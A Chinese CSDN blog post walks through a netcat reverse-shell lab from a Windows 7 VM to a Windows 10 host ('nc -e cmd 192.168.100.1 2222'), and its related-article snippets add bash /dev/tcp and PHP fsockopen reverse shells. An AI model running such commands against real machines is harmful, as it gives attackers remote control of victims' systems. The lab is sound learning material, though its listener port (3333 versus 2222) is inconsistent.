Windows10与虚拟机win7在vmnet1(仅主机模式下)使用nc进行反弹shell练习

最新推荐文章于 2024-04-21 12:44:28 发布
最新推荐文章于 2024-04-21 12:44:28 发布
阅读量421 收藏 11
点赞数 6
分类专栏: web安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47402792/article/details/135441695
版权

目录

1.nc的下载

在这里插入图片描述

2.nc的布置

  • 将压缩包解压之后,获取到nc.exe
  • 为了可以让cmd直接使用nc命令,需要设置nc的环境变量或者将nc.exe放的cmd.exe的同根目录之下。
  • 每次使用nc时,都需要信任。

3.控制方、被控制方身份+反弹shell操作

Windows10为控制方(简称win10)
Windows7为被控制方(简称win7)
win7将自己cmd的权限发送到win10 的2222端口。

  • win10使用 nc -lvvp 3333对自己的2222端口进行监听。
  • win10使用ipconfig获取vmnet1的ipv4:192.168.100.1
  • win7使用cmd进行反弹shell,在cmd中输入 nc -e cmd 192.168.100.1 2222将win7的cmd权限发送到win10的2222端口。

4.效果+结束

  • win10监听成功之后,win7的cmd权限就到了win10方,win10可以输入ipconfig可以获取win7输入ipconfig的结果,win10对win7进行了远程控制。
  • 使用exit或者ctrl+c进行终止。
#sure#
关注
  • 6
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
如何用内网虚拟kali实现反弹shell
qq_44657899的博客
05-23 9089
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击:kali虚拟(位于内网) ip:192.168.77.128 宿主机win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟kali。可以通过端口转发的功能来实现,比如我
信息安全技术(二)-- 利用 metasploit 创建并反弹 shell
yi23456qi的博客
06-19 447
知识是不断从学习中得到的,经验是从尝试中得到的!
反弹shell 看这一篇就够了
最新发布
m0_69043895的博客
04-21 1372
在计算网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
反弹shell学习
qq_45766062的博客
10-29 354
什么是反弹shell 反弹shell就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转,简单来说就是你作为tacker想连接到受害者电脑上,然后受害者主动发送了一个连接要求给你。 为什么要反弹shell 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台器,打开了该器的一个端口,攻击者在自己的器去连接目标器(目标
windows 反弹shell_怎么反弹shell(reverse shell
weixin_39956451的博客
11-19 2109
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。正向连接:我们本去连接目标器,比如ssh和mstsc反向连接:目标器去连接我们本那么为什么反向连接会比较常用呢目标器处在局域网内,我们正向连不上他目标器是动态ip目标器存在防火墙然后说一下我的实验环境虚拟采用nat模式攻击:Kali Linux :...
反弹Shell的基本操作
weixin_46831054的博客
11-26 968
反弹shell定义: 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台器,打开了该器的一个端口,攻击者在自己的器去连接目标器(目标ip:目标器端口),这是比较常规的形式,我们叫做正向连
10种反弹shell方式
kevinhanser
03-30 4875
参考链接1:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 参考链接2:https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html 10种反弹shell方式 2019年3月30日【原创】 bash perl py...
解决VMware主机模式虚拟无法ping通物理问题
01-10
(1)ping的地址不对,由于是“主机模式”,所以物理虚拟通讯用的网络适配器是VMnet1,因此,ping的时候应该写VMnet1的地址,ping它才是ping宿主机 (2)物理防火墙的原因,关闭防火墙即可 总结 以上...
物理主机ping不通虚拟的解决方案(Windows
01-07
1、查看虚拟ip 2、使用物理ping虚拟,不通 3、打开物理网络连接,按图示勾选,注意此处虚拟适配器是VMnet8 4、点开Internet协议版本4 (TCP/IPv4)将IP和DNS全都选择自动获得 5、回到虚拟点开虚拟网络编辑...
win7下VMware虚拟安装linux7.2上网配置教程
01-20
win7系统上VMware虚拟安装linux7.2上网配置,供大家参考,具体内容如下 环境: 本window7系统,安装VMware虚拟,在VMware安装了Rdhat系统,想上网,在网上搜索了不少的配置方法,这篇文章介绍的比较全面,...
Vmware虚拟下三种网络模式配置.docx
06-13
VMware workstation安装好之后会多出两个网络连接,分别是VMware Network Adapter VMnet1和VMware Network Adapter VMnet8,这两个是可以在主机的网络连接中可以查看到的,还有一个是VMnet0,可以在virtual network ...
VMware虚拟创建安装之后不出现VMnet1和VMnet8虚拟网卡
01-07
1、安装好VMware后,没有VMnet1和VMnet8虚拟网卡 VMware虚拟无法将网络改为桥接状态 2、解决方法:首先把你之前安装的VMware虚拟卸载,清理得一干二净; 3、原因是虚拟安装的时候,无法写入注册表,我们可以...
【安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 5898
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
反弹shell常见方法总结
qq_45746681的博客
10-08 713
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹: 前言 记录并总结下常用到的各种反弹shell的姿势,方便以后使用 环境:攻击:windows,192.168.0.105 服务器:kail,192.168.0.107 一.Bash反弹 首先在攻击上执行 nc -lvvp 3333 进行监听 在kail上执行 bash -i >& /dev/tcp/192.168.0.105/3333
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1117
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击监听在某个TCP/UDP端口为服务端,目标主动发起请求到攻击监听的端口,并将其命令行的输入输出转到攻击。 正向连接 假设我们攻击了一台器,打开了该器的一个端口,攻击者在自己的器去连接目标器(目标ip:目标器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
内网kali 通过ngrok穿透反弹shell
失心少年
08-05 7618
1、在ngrok注册账号,并且开通免费隧道(网址:https://www.ngrok.cc) 这里我kali的内网ip地址是10.10.10.131 2、.下载Ngrok客户端 (地址https://www.ngrok.cc/download.html) 解压后上传至kali 或者传到kali后unzip 命令进行解压 得到一个sunny文件 3...
【网络安全】nc的安装和简单操作
热门推荐
你在看屏幕的同时,屏幕也在注视着你
03-08 1万+
nc的安装和简单操作 一.下载nc(这里我用的是yum源的下载) 命令: yum install -y nc 二.实现连接通信操作 (我这里用的是两台虚拟相互通信, 分别是contos 7 x86版 和 kali 2022版,这里可以把contos当作靶,kali当作客户端) 1.查找kali的ip地址 命令:ifconfig 2.利用nc 打开端口进行监听(这里我打开的是9999端口) 命令:nc -lnvp 9999 这样就说明已经开始监听了。 3.打开contos 7 连接kali 命令:nc
Linux简单渗透、反弹shell、常见脚本反弹方法
zhao__b的博客
11-26 2289
Linux简单渗透 这是我在课堂上做的一个小实验,首先电脑要有Java软件,没有去电脑管家下载一个,用于后期渗透。 第一步:打开软件点击管理,会出现让我们生成的界面,密码、密钥可以改,自己记住就行,这里我用的默认,有效载荷更具自己需求更改,这里我用的php,然后点击生成。 第二步:点击生成后会让我们选择一个存放文件地址,更具自己想放那放那,然后会在存放文件里生成一个php文件,右击我们用notepad++(这里我用的是notepad++)打开可以看到文件里的内容。 第三步:把刚才..
shell反弹的几种方式
nextdoor6的博客
05-16 5850
直接利用linux上的bash进行反弹 nc本地监听 nc -l -p port -vv base反弹 bash -i >& /dev/tcp/ownip/port 0>&1 利用其他服务器运行环境反弹,比如php,python等。 nc本地监听nc -l -p port -vvv php -r '$sock=fsockopen("10.0.0.1",1234);exec
vmnet8在主机虚拟之间起什么作用
04-01
具体来说,它为虚拟提供了一个虚拟的网络接口,使得虚拟可以像在真实的网络中一样与主机和其他虚拟进行通信。 在使用VMware虚拟时,vmnet8通常用于实现主机虚拟之间的NAT网关,即将虚拟的网络流量...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值